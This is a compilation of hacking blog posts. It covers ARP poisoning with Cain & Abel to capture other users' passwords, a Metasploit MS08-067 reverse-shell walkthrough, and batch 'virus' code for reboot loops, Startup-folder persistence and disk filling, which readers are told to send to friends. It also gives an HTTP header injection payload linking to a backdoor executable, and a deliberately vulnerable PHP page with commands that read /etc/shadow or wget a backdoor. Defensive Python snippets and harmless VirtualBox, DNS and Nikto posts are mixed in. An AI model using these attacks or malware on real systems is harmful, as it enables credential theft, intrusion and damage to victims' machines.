Who doesn't know the best-matched pair in the hacking world? Yes, Cain & Abel; together they are a pair for hacking inside a network, with a fairly complete feature set. Here I want to give a Cain & Abel tutorial plus a preview. Download link for Cain & Abel: http://www.oxid.it/cain.html. I don't need to teach the install; I assume everyone can do that. Note that this works within one network, so if you are at an internet café, the usernames and passwords of people logging in to FS, FB and the like can be obtained. The same applies on a hotspot, which is what I did.

Go straight ahead and open Cain & Abel. Click Start/Stop Sniffer as in the picture. After that, click the blue + sign to scan MAC addresses; the display will look like this. In the MAC address scan dialog just click OK; it will load and find many IP addresses in the network along with their MAC addresses. Once you get this far, move straight on to the next step.

Click APR in the tab at the bottom; the display will look like this. Then click the blue + sign to add the IP addresses you want to poison; the display will look like this. On the left, choose the router's IP [how do we know the router's IP? Does that need explaining too? Open cmd and type ipconfig /all and you get all the information. Work out for yourself which one is the router]. On the right are the IP addresses you want to poison; if you want the whole network, just select them all. Then click OK. After that step the display looks like this: the status is Idle, right? That means it is not being poisoned yet. Click Start/Stop ARP and the status will change to Poisoning. The list below shows that a process is running.

Go straight to Passwords by clicking the Passwords tab at the bottom, then click HTTP on the left and see the result. Done. I deliberately left one of them uncovered; try it and see whether it still works for logging in.
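What the APR poisoning above looks like from the defender's side: an added example (not Cain & Abel code, not from the post) that parses tcpdump-style ARP reply lines and raises an alert when the gateway's MAC flips or one MAC starts answering for several IPs. The log lines, the gateway address 192.168.1.1 and all MACs are constructed values.

```python
"""ARP-spoof detector for the APR (ARP poison routing) scenario above.

Input: tcpdump-style "<time> reply <ip> is-at <mac>" lines, e.g. from
`tcpdump -n arp` or a sniffer on the same segment. Added example; sample
data is constructed, the gateway IP and MACs are assumptions.
"""
import re
from collections import defaultdict, namedtuple

Alert = namedtuple("Alert", "ts kind subject detail")

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+)\s+reply\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_arp_replies(lines):
    """Yield (timestamp, ip, mac) for every ARP reply line; other lines are ignored."""
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if m:
            yield m["ts"], m["ip"], m["mac"].lower()


def detect_arp_spoof(lines, gateway_ip):
    """Flag the two symptoms of APR-style poisoning.

    1. An IP whose MAC changes between replies (worst case: the gateway).
    2. One MAC that answers for more than one IP, which is what a poisoner
       does when it impersonates the gateway toward every victim.
    """
    last_mac = {}
    ips_by_mac = defaultdict(set)
    alerts = []
    for ts, ip, mac in parse_arp_replies(lines):
        prev = last_mac.get(ip)
        if prev is not None and prev != mac:
            kind = "gateway_mac_changed" if ip == gateway_ip else "mac_changed"
            alerts.append(Alert(ts, kind, ip, f"{prev} -> {mac}"))
        last_mac[ip] = mac
        ips_by_mac[mac].add(ip)
        if len(ips_by_mac[mac]) == 2:  # raised once, when a MAC first claims a second IP
            alerts.append(Alert(ts, "one_mac_many_ips", mac, ",".join(sorted(ips_by_mac[mac]))))
    return alerts


# Constructed capture: the real gateway answers first, then a poisoner
# (00:aa:bb:cc:dd:99) claims both the gateway and a victim.
SAMPLE_ARP_LOG = """\
12:00:01 reply 192.168.1.1 is-at 00:11:22:33:44:55
12:00:02 reply 192.168.1.5 is-at 00:aa:bb:cc:dd:01
12:00:03 reply 192.168.1.6 is-at 00:aa:bb:cc:dd:02
12:00:10 reply 192.168.1.1 is-at 00:aa:bb:cc:dd:99
12:00:11 reply 192.168.1.5 is-at 00:aa:bb:cc:dd:99
"""

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_LOG.splitlines(), gateway_ip="192.168.1.1"):
        print(alert)
```

Gateway failover (VRRP/HSRP) and NIC replacements also change a MAC, so treat the alerts as triage leads and confirm against the switch's MAC table or a static ARP entry for the gateway.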
Thursday, 17 May 2012
Cain and Abel tutorial
Tuesday, 15 May 2012
Virtual LAN Lab II
Now we run the Windows XP that has been installed in VirtualBox.
Go to Control Panel – Network Connections and a window like the picture below will appear:
Right-click that Ethernet connection and choose Properties; a window like the following will appear:
Select Internet Protocol (TCP/IP) and click the Properties button; a window will appear for entering the IP address and subnet mask. Enter IP 192.168.0.2 and subnet mask 255.255.255.0. For details see the picture below:
The settings are done; now we will try to ping from the guest (Windows XP) to the host or server (Windows 7).
Open Command Prompt by pressing Windows + R and typing cmd, or find it via Start – All Programs – Accessories – Command Prompt. The Command Prompt will appear as follows:
Virtual LAN Lab I
For the past few days I have been learning to build a client-server application, but the obstacle is that building a client-server application requires at least two computers, the first as the server and the second as the client, with the two connected to each other, whereas I only have one computer.
So I looked for a way to use my single computer to learn how to build a client-server application.
The workaround is software called VirtualBox, with which we can install various kinds of operating systems on one computer.
OK, let's get straight to how to build a small LAN (Local Area Network) using VirtualBox, with Windows 7 as the host and Windows XP as the guest.
Here I use VirtualBox version 4.1.2. Assume we have already installed Windows XP in VirtualBox; go to Settings – Network and under Attached To choose Host-Only Adapter. For details see the picture below:
Next we set the computer name and workgroup on Windows 7: go to Control Panel – System – Advanced System Settings. A menu like the picture below will appear:
Change the Computer Description; in the example above I use the name amelia1, but you can change it to whatever name you like :).
Click the Change button and a menu like the picture below will appear:
Change the Computer Name as you wish and create the Workgroup name that will later be used as the workgroup for the LAN. In the example above I use virdane1 as the Computer Name and P1 as the Workgroup name.
OK, the computer name and workgroup are set; now it is time to give an IP address to the VirtualBox Host-Only Network adapter. Go to Control Panel – Network and Sharing Center – Change Adapter Settings and select VirtualBox Host-Only Network, as in the picture below:
Next right-click that VirtualBox Ethernet adapter, choose Properties, select Internet Protocol Version 4 (TCP/IPv4) and click the Properties button. For details see the picture below:
Next set the IP address to 192.168.0.1 and the subnet mask to 255.255.255.0. For details see the picture below:
OK, we have successfully set the VirtualBox IP address; next we will set the IP address on the guest, the Windows XP installed in VirtualBox.
7 Ways to Open Sites Blocked by Telkom
1. Opening blocked sites by changing DNS
The way I find most effective for accessing blocked sites is to change your DNS to a public DNS. Here is how to access blocked sites by changing DNS:
- Open Control Panel >> Network and Internet >> Network and Sharing Center
- Select Local Area Connection >> Properties >> Internet Protocol Version 4 >> Properties
- Enter the following Google DNS details in your DNS settings
Preferred DNS Server : 8.8.8.8
Alternate DNS Server : 8.8.4.4
2. Opening blocked sites using the Turbo feature of the Opera browser
The Opera browser now comes with Opera Turbo. Its original purpose is to speed up browsing by compressing the site's files on Opera's servers, but we can use it to get into blocked sites. Here is how to enable Opera Turbo:
- Open your Opera browser
- In the bottom-left toolbar, click the "speedometer" logo.
- Choose Enable Opera Turbo
3. Accessing blocked sites using the site's IP address
If a site is blocked by domain name, you can open it using the site's IP address. Suppose www.pusatgratis.com is blocked by domain; you can access pusatgratis as follows:
- Look up the IP of www.pusatgratis.com: open Start >> Run >> type CMD >> press Enter >> type ping www.pusatgratis.com >> press Enter
- Type that IP into the browser and press Enter to access it.
4. Accessing blocked sites using a proxy
To get access to blocked sites you can also use a proxy. For this trick, it is best to use the Mozilla Firefox browser.
- Find a list of free proxies you can use. I usually look here
- In Mozilla Firefox, choose Tools >> Options >> Advanced >> Network
- Under Connection, choose Settings.
- Enter the details of the proxy you picked from the proxy list.
- Click OK
5. Opening blocked sites with a web proxy
A web proxy can also be used to get around a blocked site. Just enter the URL in your favourite web proxy. The web proxy I usually use is bingproxy.appspot.com
6. Opening blocked sites using a search engine's cache
Both Google and Yahoo keep a cache of every site they index. You can use it to open your favourite sites blocked by Telkom and others.
7. Accessing blocked sites using an online translator
Yes, you can use an online translator to open blocked sites. Just enter the URL in the translate form and translate without changing the language. Some online translators you can use include:
Google Translate
Bing Translator
Changing DNS to a public DNS (method 1) is the most practical and most effective way to open blocked sites.
There are actually other ways, such as using a web proxy, etc., but I have not included them because browsing through a web proxy requires extra patience (slow loading, pages that do not load completely, etc.).
Tutorial Metasploit
We have all seen movies like Hackers, and we have all imagined becoming the person in those movies.
So, taking a step toward that dream, I am giving a small tutorial on Metasploit. I will use the term msf instead of Metasploit.
For those who don't know what msf is and have always been fascinated by black and green screens, here is how it is done.
I am going to use Nessus for vulnerability scanning, and the rest of the work will be done by msf. I will also be using the msf console because it gives better control over the framework and faster response; using the console has one more advantage: it gives the geeky look that we all associate with something very hi-fi.
Cutting the discussion short and coming directly to the topic.
I will describe how to do it in steps for better understanding. For this purpose I have used two systems connected via WAN; the host OS does not matter, and the victim has XP installed.
Basic commands to be known:
1. Searching for anything: "search name"
2. Set the exploit: "use exploit_name"
3. Set the payload: "set payload payload_name"
4. See info: "info name"
STEP 1:
First, instead of using nmap for port scanning, we have used Nessus for vulnerability scanning. Nessus has one more advantage: it gives each vulnerability a number, which helps in searching msf for the proper exploit.
So, first we will scan the target.
In the above scan you can see how good Nessus is at giving information about the level of vulnerability.
After analysing the report we see 5 high vulnerabilities, so clicking on the first one, let's see its details:
We can see lots of info about the vulnerability. The vulnerability here is a service flaw on port 445 that has been given the number MS08-067; this number is going to be of great help later.
STEP 2:
In msf we are going to search for the proper exploit for this vulnerability. To make the search easier we type search followed by the number, and voilà, what we get is the exact name of the exploit. In other cases, where you don't know the number or id, we can also search by various parameters such as the name (e.g. search name); then we have to choose the best one among the results by comparing all the requirements and how they work.
Now, since here we have the exact exploit, we are going to use it. The command for it:
use exploit_name, e.g. use windows/smb/ms08_067_netapi
We will check the various parameters by typing: info windows/smb/ms08_067_netapi
STEP 3:
Now it's time to set the victim's IP address, i.e. RHOST; RPORT is already set to 445.
Command to set RHOST: setg RHOST 192.168.1.5
Note:
(192.16.1.5 is the IP address of my PC on the local network which I am going to attack)
STEP 4:
After setting the exploit, it's time to set the payload, so the main question arises: which payload to use?
The options for this question can be narrowed by typing show payloads, which gives the list of payloads compatible with that exploit.
From that list we select a payload; I prefer meterpreter/reverse_tcp.
To use this payload type the command: set payload windows/meterpreter/reverse_tcp
Then I will check its parameters, i.e. LHOST, LPORT etc. To check them we type info windows/meterpreter/reverse_tcp
Here we have to change LHOST; LHOST refers to the IP address of the attacker, i.e. mine.
So to set LHOST we do: setg LHOST 192.168.1.10
All done; we are now ready to exploit.
STEP 5:
Finally we type exploit and voilà, the attack is successful and a session is created.
Now what? Just type the command help and you will get a list of commands like kill process, shutdown, hash dumps, but I like shell because it gives you full command-line control of the system, which you can see in the picture above.
Special thanks: ICW, AH, guys and b0nd bro for their help in learning.
NOTE:
1. This tutorial is only for learning purposes; the author is not responsible for any illegal use.
2. Any use of this tutorial is at your own risk.
Saturday, 12 May 2012
Tutorial virus IV
Code:
______________________________
@echo off
mkdir virus
:loop
cd virus
mkdir virus
echo>text.txt
echo virus in the pc!!!!>>text.txt
goto loop
______________________________
Copy the code, paste it into Notepad and save it as anything.bat
This virus will create infinite virus folders and text.txt files inside the virus folder until the disk is completely filled.
Explanation:
mkdir: this command is used to create a new folder.
cd: this command is used to change the current directory.
echo >text.txt: this command creates a new file "text.txt"
echo text >>text.txt: this command appends the text specified after the echo command to the text.txt file.
:loop
command
goto loop
^^^ looping statement in batch files
Tutorial virus III
So let's start.
======================================
Steps:
1) Open Notepad and copy-paste any of the following codes.
<<<<<<<<<<<<<< Code -01 >>>>>>>>>>>>>>>>
@echo off
:loop
msg * write your text here
goto loop
<<<<<<<<<<<<<< Code ends >>>>>>>>>>>>>>>
<<<<<<<<<<<<<< Code -02 >>>>>>>>>>>>>>>>
@echo off
:loop
start iexplore.exe www.anywebsite.com
goto loop
<<<<<<<<<<<<<< Code ends >>>>>>>>>>>>>>>
<<<<<<<<<<<<<< Code -03 >>>>>>>>>>>>>>>>
@echo off
:loop
msg * Enter your text here
start iexplore.exe www.anywebsite.com
goto loop
<<<<<<<<<<<<<< Code ends >>>>>>>>>>>>>>>
<<<<<<<<<<<<<< Code -04 >>>>>>>>>>>>>>>>
@echo off
xcopy "virusname.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" /y
msg * Enter your text here
start iexplore.exe www.anywebsite.com
goto loop
<<<<<<<<<<<<<< Code ends >>>>>>>>>>>>>>>
2) Save the file as Anyname.bat; the .bat extension is compulsory.
3) Download the Batch to Exe converter:
http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
4) Open the Batch to Exe converter.
5) Browse to your batch file.
6) You can choose the icon of the output file:
6.1) Go to Version Information
6.2) Click the "..." button (that's a browse button) and browse to your icon file.
7) After that click Compile.
8) Now your .exe virus is ready; send it to your friends and have fun.
For sending methods, refer to these posts:
https://www.facebook.com/237993949585497/posts/305182709533287
https://www.facebook.com/237993949585497/posts/306495276068697
Instead of keylogger.exe, use virusname.exe in all places in the above tutorial.
======================================
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Logic !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
__________________
:loop
any batch command
goto loop
__________________
^ This syntax is called looping. Any command placed in place of "any batch command" will be executed an infinite number of times.
______________________________________________
About codes:
Code-01: this code will show infinite message boxes saying: ***write your text here***
Code-02: this code will open a website ***www.anywebsite.com*** infinite times in Internet Explorer.
Code-03: this code will open both the message and the website, but the execution order will be: first the message box, then the web page, then again the message box and then again the web page; this continues until the system is restarted.
Code-04: it is quite deadly, as it executes the same as Code-03 but will continue to execute even after the system is restarted. Be careful while using this. The important thing you have to do is change ***virusname.exe*** to the name you are going to give the final file.
______________________________________________
About commands:
msg * write your text here
This command displays a text box containing the text specified after "msg * ". Replace "write your text here" with whatever you want to appear in the message box.
start iexplore.exe www.anywebsite.com
^ This command opens "www.anywebsite.com" in Internet Explorer. You can change "www.anywebsite.com" to whatever website you want to open after execution of the virus.
xcopy: this command copies the file specified in double quotes, "virusname.exe", to the location specified in double quotes (in this case the Startup folder), "C:\Documents and Settings\All Users\Start Menu\Programs\Startup". Make sure the final file has the name "virusname.exe".
Startup: this folder contains files to be opened whenever your computer boots up. If you want any file to open whenever your computer starts, just place that file in this folder and it will automatically be opened on every boot.
/y: this parameter tells the command prompt to overwrite the file
******************************************
Learn to hack tries to provide the best quality posts explained in the easiest way possible; still, if you have any queries, please post your queries and feedback in the comments.
NOTE: This tutorial is for educational purposes only. Use at your own risk.
Learn to hack is not responsible for any type of mishap caused by this information!!
Tutorial virus II
Let's program a slightly more dangerous virus!!
________________________________
@echo off
shutdown -r -t 100 -c "rishabh"
xcopy "filename.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" /y
________________________________
Save it with a .bat extension, but with the name **filename.bat**.
You can change "rishabh" to whatever message you want, and you can also change "100" (in seconds) to whatever time you want before the restart.
If you change **filename.bat** to "othername.bat", then also change the above code to
|| xcopy "othername.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" /y ||
Send this file to your friends using a pen drive or by uploading it to a rapidshare/hotfile service.
LOGIC:
.bat: files with this extension are known as batch files, containing commands to be executed by the command interpreter.
@echo off: this command turns off echoing of the commands you put in your batch file.
-r: this parameter restarts the PC. You can also use "-s" (without quotes) to shut down the PC.
-t: this parameter specifies the time in seconds.
-c: this parameter is used to specify a message in the shutdown box.
xcopy: this command copies the file specified in double quotes, "othername.bat", to the location specified in double quotes (in this case the Startup folder), "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
Startup: this folder contains files to be opened whenever your computer boots up. If you want any file to open whenever your computer starts, just place that file in this folder and it will automatically be opened on every boot.
/y: this parameter tells the command prompt to overwrite the file
After running this virus the PC will restart; after the restart it will restart again, and so on...
The only way to stop this is to pull the plug directly.
Solution: boot the computer in Safe Mode and delete the batch file from the Startup folder.
Tutorial virus I
Let's do some programming!!
How to create a harmless virus to mess with your friend's computer!!
1) Open Notepad and type the following code:
________________________________
@echo off
shutdown -r -t 100 -c "rishabh"
________________________________
Save it under any name with a .bat extension, like **game.bat**.
You can change "rishabh" to whatever message you want, and you can also change "100" (in seconds) to whatever time you want before the restart.
Send this "game.bat" to your friends using a pen drive or by uploading it to a rapidshare/hotfile service.
LOGIC:
.bat: files with this extension are known as batch files, containing commands to be executed by the command interpreter.
@echo off: this command turns off echoing of the commands you put in your batch file.
-r: this parameter restarts the PC. You can also use "-s" (without quotes) to shut down the PC.
-t: this parameter specifies the time in seconds.
-c: this parameter is used to specify a message in the shutdown box.
Note: if by mistake you double-click the shutdown file, immediately type "shutdown -a" in the Run box. This virus will not harm your computer; it will just turn off/restart your PC.
Saturday, 5 May 2012
HTTP header injection
If we can inject a newline into a header we control, then we will be able to insert additional HTTP headers and some nasty body text. I don't think we can compromise a website/server via this vulnerability, but it is still powerful for social engineering attacks, phishing, redirecting to malicious sites, downloading backdoors, virtual defacement, sometimes injecting cookies, etc. It is much like XSS.
Basically this vulnerability is found in "Set-Cookie" and "Location". If we connect to a website:
nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit HTTP/1.1
After this GET request we get something like (try to find it):
set-cookie=PaymentMethod=credit
If this is the behaviour of the host, then we should try to insert a carriage return and line feed:
nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit%0d%0a it-is=vulnerable HTTP/1.1
If the host is vulnerable then it will reply with an additional line "it-is=vulnerable", like this:
set-cookie=PaymentMethod=credit
it-is=vulnerable
Simply put, a hacker can force the users to download a backdoor:
http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1
We can also create a fake cookie and send the URL to the poor victim. Just think smartly and you will find some other way ;)
Be aware!!!
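The Set-Cookie case above, reduced to code: an added example (not from the post) with the vulnerable header builder next to its hardened form, plus a response checker that reports header names the application never sets, which is exactly how the "it-is=vulnerable" probe line shows up. The server-side logic (decode the `method` parameter, echo it into `PaymentMethod=`) and the sample response are assumptions constructed for the example.

```python
"""CRLF / header-injection check for the Set-Cookie example above (added example)."""
from urllib.parse import unquote

# Header names the application itself emits; anything else in a response is a red flag.
EXPECTED_HEADERS = {"content-type", "content-length", "set-cookie", "date", "server", "connection"}


class HeaderInjection(ValueError):
    """Raised when a value would terminate the header line it is written into."""


def build_set_cookie_vulnerable(raw_method: str) -> str:
    """The bug: %0d%0a is decoded to a real CR LF and concatenated straight into the header."""
    return "Set-Cookie: PaymentMethod=" + unquote(raw_method)


def build_set_cookie_safe(raw_method: str, allowed=("credit", "debit")) -> str:
    """Allowlist the value first; the CR/LF check stays as defence in depth."""
    method = unquote(raw_method)
    if method not in allowed:
        raise HeaderInjection(f"unexpected payment method: {method!r}")
    if "\r" in method or "\n" in method:
        raise HeaderInjection("CR/LF in header value")
    return "Set-Cookie: PaymentMethod=" + method


def safe_builder_rejects(raw_method: str) -> bool:
    """True when the hardened builder refuses the parameter."""
    try:
        build_set_cookie_safe(raw_method)
    except HeaderInjection:
        return True
    return False


def parse_headers(raw_response: str):
    """(name, value) pairs from the header block; a line without ':' is kept whole as a name."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def unexpected_headers(raw_response: str, expected=EXPECTED_HEADERS):
    """Header names the application never sets; the probe's 'it-is=vulnerable' lands here."""
    return [name for name, _ in parse_headers(raw_response) if name not in expected]


# Constructed response: what a vulnerable host would answer to the probe from the post.
SAMPLE_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Content-Type: text/html",
    build_set_cookie_vulnerable("credit%0d%0ait-is=vulnerable"),
    "Content-Length: 5",
    "",
    "hello",
])

if __name__ == "__main__":
    print(unexpected_headers(SAMPLE_RESPONSE))          # ['it-is=vulnerable']
    print(safe_builder_rejects("credit%0d%0ait-is=vulnerable"))  # True
```

Modern frameworks already reject CR/LF in header values, so the checker is most useful against legacy code and hand-rolled CGI like the page's own `<?php system(...) ?>` style of script.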
OS command injection vulnerability
OS (operating system) command injection is a high-impact vulnerability for a server/website. If a website has an OS command injection vulnerability, then a malicious hacker can compromise the website or even the server's operating system. If a hacker can detect the vulnerability then he can run any operating system command. For example, if I run the command "rm -r /var/www" on my computer it is going to remove "www", but what if I run this command on my victim's computer?
How do we detect this vulnerability?
Suppose our target address is www.victim.com/vultest/lame.php
And the source code:
<html>
<head>
<title>Vulnerable Page</title>
</head>
<body>
<p><b>We will test OS command injection vulnerability against this page. Actually the developer doesn't know how serious the code is.</b></p>
<p><b>Output of command:</b></p>
<?php
// Deliberately vulnerable: the request parameter goes straight to the shell.
system($_REQUEST['cmd']);
?>
<p><b><i>This is how OS command injection vulnerability works.</i></b></p>
</body>
</html>
In that page the PHP code is just:
<?php system($_REQUEST['cmd']); ?>
(This is white box... Just copy it and paste it into a PHP web page for practice purposes.)
This is the OS injection vulnerability. Because of this simple mistake anyone can run any OS-specific command against the server/website.
So if we run a simple command, "ping":
We get the reply on the page (along with the other content). In a real-world test we may not see the reply, but it delays for some time (4-10 seconds?). If this is the case then we can run any command, e.g. "ls".
If any of these statements is in the source code:
exec
system
passthru
shell_exec
proc_open
pcntl_exec
then it is highly likely that the site is vulnerable.
Suppose we don't have the source code; then how do we test? The way is fuzzing (tools, manually). Sometimes we call it black-box testing.
To test it we need to write some code for fuzzing purposes, or we can use ready-made tools freely downloadable from the internet such as Burp Suite, wfuzz, vulnerability scanners, or do it manually by hand, etc. I think you have the logic for automated testing; otherwise you will get some "false" results from your lam0 tools...
Exploitation:
Note: doing it on localhost
http://localhost/vultest/lame.php?cmd=ls
It outputs:
db.php
lame.php
login.php
password.txt
test1
We can run any command (the browser URL-encodes the space for you; from a script or curl, encode it yourself as %20 or +):
http://localhost/vultest/lame.php?cmd=cat /etc/passwd
http://localhost/vultest/lame.php?cmd=cat /etc/hosts
http://localhost/vultest/lame.php?cmd=cat /etc/shadow (requires root)
http://localhost/vultest/lame.php?cmd=cp /db/to/mysql /here
http://localhost/vultest/lame.php?cmd=wget 192.168.1.212/bacdoor.php
and so on.
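The detection and exploitation steps above, automated in Python as an added example (this is not code from the original post): a white-box grep for the command-execution sinks listed above, a URL builder that encodes the command properly, and a time-based check for the blind case where the command output is not echoed. The parameter name cmd and the path /vultest/lame.php are taken from the post; the fake server at the bottom stands in for lame.php so the script runs offline, and the sleep command it uses is an assumption (the post uses ping; swap in "ping -c N 127.0.0.1" on a target without sleep).

```python
"""Helpers for spotting and confirming OS command injection.

Added example, not code from the original post. Covers the three checks the
post describes: grepping PHP source for command-execution sinks (white box),
building a properly URL-encoded attack URL, and confirming a *blind* injection
from the response delay when the command output is not echoed.
"""
import re
import time
from typing import Callable, List, Tuple
from urllib.parse import urlencode

# PHP functions (and the backtick operator) that hand a string to a shell or
# exec(). Any of these fed with request data is the bug the post describes.
SINKS = ("exec", "system", "passthru", "shell_exec", "proc_open", "popen", "pcntl_exec")
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(|`[^`\n]*\$[^`\n]*`")
# Request superglobals that carry attacker-controlled data.
SOURCE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def find_dangerous_calls(php_source: str) -> List[Tuple[int, str]]:
    """Return (line_no, line) for every line that calls a command sink and
    reads a request superglobal on the same line (white-box check)."""
    hits = []
    for no, line in enumerate(php_source.splitlines(), 1):
        if SINK_RE.search(line) and SOURCE_RE.search(line):
            hits.append((no, line.strip()))
    return hits


def build_injection_url(base_url: str, command: str, param: str = "cmd") -> str:
    """URL-encode the command. 'cat /etc/passwd' typed raw into the address
    bar only works because the browser quietly encodes the space for you."""
    return f"{base_url}?{urlencode({param: command})}"


def probe_blind(send: Callable[[str], str], base_url: str, delay: float = 5.0,
                param: str = "cmd") -> Tuple[bool, float, float]:
    """Time-based confirmation for the case where output is not echoed.

    Sends a harmless command, then 'sleep <delay>', and reports a hit if the
    second request took at least 80% of the extra delay longer. 'sleep' on the
    target is an assumption; 'ping -c N 127.0.0.1' is the drop-in alternative.
    Returns (hit, baseline_seconds, probe_seconds).
    """
    def timed(cmd: str) -> float:
        t0 = time.perf_counter()
        send(build_injection_url(base_url, cmd, param))
        return time.perf_counter() - t0

    baseline = timed("id")
    probe = timed(f"sleep {delay:g}")
    return probe - baseline >= 0.8 * delay, baseline, probe


# Constructed sample: the vulnerable page from the post, reduced to its PHP.
SAMPLE_PHP = """<?php
$name = $_GET['name'];
echo htmlspecialchars($name);
system($_REQUEST['cmd']);
?>"""


def fake_vulnerable_server(url: str) -> str:
    """Offline stand-in for lame.php: sleeps when told to, otherwise answers
    at once. urlencode turns the space in 'sleep 5' into '+'."""
    m = re.search(r"sleep\+(\d+(?:\.\d+)?)", url)
    if m:
        time.sleep(float(m.group(1)))
    return "ok"


if __name__ == "__main__":
    print(find_dangerous_calls(SAMPLE_PHP))
    print(build_injection_url("http://localhost/vultest/lame.php", "cat /etc/passwd"))
    print(probe_blind(fake_vulnerable_server, "http://localhost/vultest/lame.php", delay=0.3))
```

Against a real target, pass a function that performs the HTTP request and returns the body (for example a thin wrapper around urllib or requests) as `send`; the decision logic stays the same. Use a delay of several seconds so normal network jitter cannot be mistaken for a hit.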
I hope this explains what the vulnerability is and how attackers exploit it. This is very basic, though; you need to go further than this.
Let me know (sec00rit3y@gmail.com) if you have any questions.
Good luck!!!
Nikto web vulnerability scanner
Most of the time I use Nikto for scanning target websites. It is easy to use but really powerful. Sometimes it is annoying too, because of false positives. I will just show how to scan your own site. It scans for CGI scripts and for default files and directories.
Warning: Don't do anything illegal. I am just sharing how I practise. If you are a black-hat hacker attacking a third-party website, or doing anything else illegal, I am not responsible for that...
I believe sharing knowledge means increasing knowledge.
Nikto is a Perl script, so we need Perl installed to run it (Windows users, take note). If you don't have the tool yet, download it from http://cirt.net/nikto2. It is installed by default in BackTrack.
Simply:
root@bt:~# cd /pentest/web/nikto
root@bt:/pentest/web/nikto# ./nikto.pl -Help
Options:
   -ask+               Whether to ask about submitting updates
                         yes   Ask about each (default)
                         no    Don't ask, don't send
                         auto  Don't ask, just send
   -Cgidirs+           Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
   -config+            Use this config file
   -Display+           Turn on/off display outputs:
                         1     Show redirects
                         2     Show cookies received
                         3     Show all 200/OK responses
                         4     Show URLs which require authentication
                         D     Debug output
                         E     Display all HTTP errors
                         P     Print progress to STDOUT
                         S     Scrub output of IPs and hostnames
                         V     Verbose output
   -dbcheck            Check database and other key files for syntax errors
   -evasion+           Encoding technique:
                         1     Random URI encoding (non-UTF8)
                         2     Directory self-reference (/./)
                         3     Premature URL ending
                         4     Prepend long random string
                         5     Fake parameter
                         6     TAB as request spacer
                         7     Change the case of the URL
                         8     Use Windows directory separator (\)
                         A     Use a carriage return (0x0d) as a request spacer
                         B     Use binary value 0x0b as a request spacer
   -Format+            Save file (-o) format:
                         csv   Comma-separated-value
                         htm   HTML Format
                         msf+  Log to Metasploit
                         nbe   Nessus NBE format
                         txt   Plain text
                         xml   XML Format
                         (if not specified the format will be taken from the file extension passed to -output)
   -Help               Extended help information
   -host+              Target host
   -IgnoreCode         Ignore Codes--treat as negative responses
   -id+                Host authentication to use, format is id:pass or id:pass:realm
   -key+               Client certificate key file
   -list-plugins       List all available plugins, perform no testing
   -maxtime+           Maximum testing time per host
   -mutate+            Guess additional file names:
                         1     Test all files with all root directories
                         2     Guess for password file names
                         3     Enumerate user names via Apache (/~user type requests)
                         4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                         5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                         6     Attempt to guess directory names from the supplied dictionary file
   -mutate-options     Provide information for mutates
   -nocache            Disables the response cache
   -nointeractive      Disables interactive features
   -nolookup           Disables DNS lookups
   -nossl              Disables the use of SSL
   -no404              Disables nikto attempting to guess a 404 page
   -output+            Write output to this file
   -Pause+             Pause between tests (seconds, integer or float)
   -Plugins+           List of plugins to run (default: ALL)
   -port+              Port to use (default 80)
   -RSAcert+           Client certificate file
   -root+              Prepend root value to all requests, format is /directory
   -Single             Single request mode
   -ssl                Force ssl mode on port
   -Tuning+            Scan tuning:
                         1     Interesting File / Seen in logs
                         2     Misconfiguration / Default File
                         3     Information Disclosure
                         4     Injection (XSS/Script/HTML)
                         5     Remote File Retrieval - Inside Web Root
                         6     Denial of Service
                         7     Remote File Retrieval - Server Wide
                         8     Command Execution / Remote Shell
                         9     SQL Injection
                         0     File Upload
                         a     Authentication Bypass
                         b     Software Identification
                         c     Remote Source Inclusion
                         x     Reverse Tuning Options (i.e., include all except specified)
   -timeout+           Timeout for requests (default 10 seconds)
   -Userdbs            Load only user databases, not the standard databases
                         all   Disable standard dbs and load only user dbs
                         tests Disable only db_tests and load udb_tests
   -until              Run until the specified time or duration
   -update             Update databases and plugins from CIRT.net
   -useproxy           Use the proxy defined in nikto.conf
   -Version            Print plugin and database versions
   -vhost+             Virtual host (for Host header)
   + requires a value
Running ./nikto.pl -Help (or perl nikto.pl -Help) prints these details and all the options.
Now we are going to scan our own company's website, because we are pentesting it. Easy:
root@bt:/pentest/web/nikto# ./nikto.pl -h target.com
I ran it against my own localhost to paste the output here. This is the kind of output and findings we may get:
root@bt:/pentest/web/nikto# ./nikto.pl -h target.com
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: ip address
+ Target Hostname: target.com
+ Target Port: 80
+ Start Time: 2012-01-21 13:48:22 (time format)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
+ Retrieved x-powered-by header: PHP/5.2.17
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.0-fips appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
